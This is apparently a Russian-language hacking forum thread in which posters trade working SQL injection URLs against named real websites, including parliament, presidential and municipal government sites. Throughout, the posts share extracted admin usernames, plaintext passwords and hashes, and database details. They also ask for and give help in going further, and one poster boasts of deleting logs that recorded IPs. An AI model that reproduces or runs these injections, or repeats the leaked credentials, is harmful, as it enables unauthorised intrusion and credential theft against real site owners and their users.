SQL Инъекции

http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+users+limit+2,1/*


login:brianficek
pass:85688717ef4fab9 mb md5 64 bit?

 

Список БД
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/*

БД jos_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x6a6f735f7573657273/*
немогу данный просматреть

БД phpbb_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x70687062625f7573657273/*

И опять же не могу просмотреть
P.S я делаю вот так http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_users+limit+1,1--

Скажите в чем проблема?

 

http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,username,5,6,7+from+db4514a.phpbb_users/*

нужно указывать и название базы

 

ЛОГИН:Anton
Пароль:majestic

http://www.devchatnik.ru

СКУЛЬ (http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,concat_ws(0x3a,users_login,users_password),5,6,7+from+xz_users/*)

P.S я удалил админские логи которые записывали IP

 

Я е..л и плакал...

http://vli-info.ru/index.php?p=show_cont&parent_id=-1+union+select+1,2,3,concat(login,0x3a3a,password,0x3a3a,admin),5,6,7+from+users+limit+0,1

login: admin pass:1q2w3e4r

http://vli-info.ru/index.php?p=login

Тематика сайта и факт взлома заставили меня немного прслезиться...

 

http://www.bohnespring.ca/page.php?ID=4+union+select+1,2,user(),version(),5++limit+1,1/*

[email protected]
4.0.27-standard-log

 

http://www.michaelpollan.com/article.php?id=-1+union+select+1,version(),database(),4,5,6,user(),8,9,0+from+articles/*

4.1.22-standard
pollan_articles
pollan_article@localhost

 

Dbname: stjohns
Version: 4.1.20
User: [email protected]

 

http://www.iped.com/cm.php?id=-38'+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+iped.user+limit+1,1/*

 

http://wmbuy.info/index.php?gid=-1+union+select+concat(0x3a3a,login,0x3a3a,password)+from+users+limit+1,1

login:admin pass:ffffff

 

Code:

http://fashion1001nights.net/productdetail.php?catId=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3/*

Code:

http://www.compel.com.tr/Include/Modules/ProductDetail.php?CatID=-1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*

 

Hacked By Errsec

На счёт темы про Грузию. Сайт парламента Грузии

ПРОСТЕЙШАЯ дырка, ппц


http://www.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-20026+UNION+SELECT+1,2,3,4,5,6,7,password,9,10,11,12,13+FROM+users--

user: dato@localhost
version: 5.0.51a-log


db: parliament
db: users


55e9a83d8533e24df2a3d444aedb48e8

login: vivageodea
pass: eannia


http://www.parliament.ge/admin/
доступ по IP , .htaccess

кто пройдёт дальше, отпишите плз

 

http://imperialove.ru/main/index.html?id=102&parent_id=-1+union+select+1,2,3,4,5,concat(0x3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a,user_login,0x3a3a,user_password),7,8+from+sys_users+limit+1,1

http://imperialove.ru/admin

login:admin pass:Ximper2ia

Зы:2 geforse С вопросами в тему 'Ваши вопросы по узвимостям'!!!!

 

Code:

http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),%20database()),10/*
olympicwatch_org_db@localhost:4.0.22:olympicwatch_org_db

+ раскрытие пути Warning: getimagesize(): Unable to access ./img/img_php/1_obrazek1.8 in /domains3/olympicwatch-org/ftp/www_root/news.php on line 67

+ есть таблица users
http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,id,5,6,7,8,user,10+from+users/*
1
olympicwatch-admin

Точно названия поля с хэшем подобрать не получилось, пришлось выдирать через хитрую задницу
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1,2,3,4,5,6,7+from+users/*
затем, хитрый join три раза, поскольку поля лежали в не выводимых областях
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1+from+users+join+users+u+join+users+b/*

Хэш:f0b16007c9541482261c66376e8eaf03
Подобрать не удалось, точный алгоритм не установлен. С учётом того, что в users три поля, соли там (скорее всего) нет.
Ничего особо интересного найти не удалось.

 

Code:

http://www.termal.gov.tr/portal/modules/articles/article.php?id=1%20UNION%20SELECT%201,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

 

Вот несколько вкусных скулей от меня

Code:

http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*
iletisim (Id)
kullanici_log
kullanicilar(ID, kullanici, sifre)
kurul_uyeler
kurullar 
sayfa_icerik (KatID)
sayfalar (ID, sayfa_id, kullanici_id, sira, sayfa_adi, sayfa_adres, ust_id)
smf_members(ID_MEMBER, memberName, lngfile, passwd, ICQ, AIM, YIM, MSN  )
smf_moderators 
urun 

http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x696C65746973696D+limit+7,1/*
http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID,0x3a,kullanici,0x3a,sifre),6,7,8,9,10,11,12,13+from+kullanicilar+limit+0,1/*
http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID_MEMBER,0x3a,memberName,0x3a,passwd,0x3a,ICQ),6,7,8,9,10,11,12,13+from+smf_members+limit+0,1/*

Code:

http://www.newportky.gov/inner_main.php?secid=-149+UNION+SELECT+concat(username,0x3a,password),2+from+users+limit+0,1/*

Code:

http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,concat(username,0x3a,password),3+from+login/*,password),2+from+users/*
http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,2,3+from+mysql.user/*

Code:

http://www.president.mn/show_module.php?index=speech&speechid=-214+UNION+SELECT+1,concat(userid,0x3a,username,0x3a,loginname,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*

Code:

http://banten.go.id/?link=dtl&id=-2076+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

Code:

http://www.lincoln.gov.ar/index.php?seccion_generica_id=-36+UNION+SELECT+1,column_name,3+from+information_schema.columns++where+table_name=0x5553554152494F53+limit+23,1/*

USUARIOS (USUARIO_ID, CLAVE, APELLIDO_NOMBRE, CIUDAD, ACCESO_ADMIN, PAIS...)

Code:

http://www.ondostate.gov.ng/news_details.php?id=-1741+UNION+SELECT+1,concat(id,0x3a,username,0x3a,password),3+from+admin+limit+0,1/*

 

http://www.zaistinu.ru/articles/?sid=-29+union+select+version()
version() - 5.0.32-Debian_7etch6-log
user() - [email protected]
database() - zaistinu_0001

http://alterego.tut.by/library/showarticle.php?id=55+union+select+1,user(),version(),database(),5,6
version() - 4.0.27-log
user() - [email protected]
database() - alteregotutby

 

Cайт: clas.ru

Code:

http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_Ws(0x3a,database(),version(),user()),5,6,7,8--

User:u8122(sobaka)10.10.223.235
Version:5.0.45-log
Database:u8122_1gb_clas
Таблички:

Code:

bag
buyers
c_fields
c_order_fields
c_order_items
c_orders
colors
comments
companies
counter
countries
deliveries
delivery_fields
delivery_paids
distributors
fasons
genres
groups
ids
kath
links
media
messages
movies
news
news_items
opinions
orderpositions
orders
paids
people
pic
pic_any
presence
recences
screensizes
shirtmodels
shirts
shirtsgroup
sizes
staff
staff_types
subscribers
t_dostavka
t_news
t_oplata
t_rasskaz
t_users
texts
translations
users
vote_details
vote_items
vote_list
votes
wanted
book_wanted

Дальше не смог докопать,пошёл спать

 

Мм... поможем

Просматриваем таблицу t_users лимитом

Code:

http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x745f7573657273+limit+0,1--

Видим интересные поля: id, pass... Также адреса, телефоны, IP-адреса и т.д. Кароч хорошая БД.

Code:

http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(id,0x3a,pass),5,6,7,8+from+t_users--

Эмм, логина не нашел. Идем в buyers.

Code:

http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(login,0x3a,pass),5,6,7,8+from+buyers+limit+1,1--

И вот и пошли логины с пассами

 

http://www.terranita.ro/int/index.php?req=catalog&src=-10'+UNION+SELECT+1,2,table_name+from+information_schema.tables+limit+1,1/*&zid=1

Database Version: 5.0.26
Database name: terranita_facelift
User name: terranita_user@localhost



http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10/*

Database Version: 5.0.26
Database name: lobont1
User name: lobont@localhost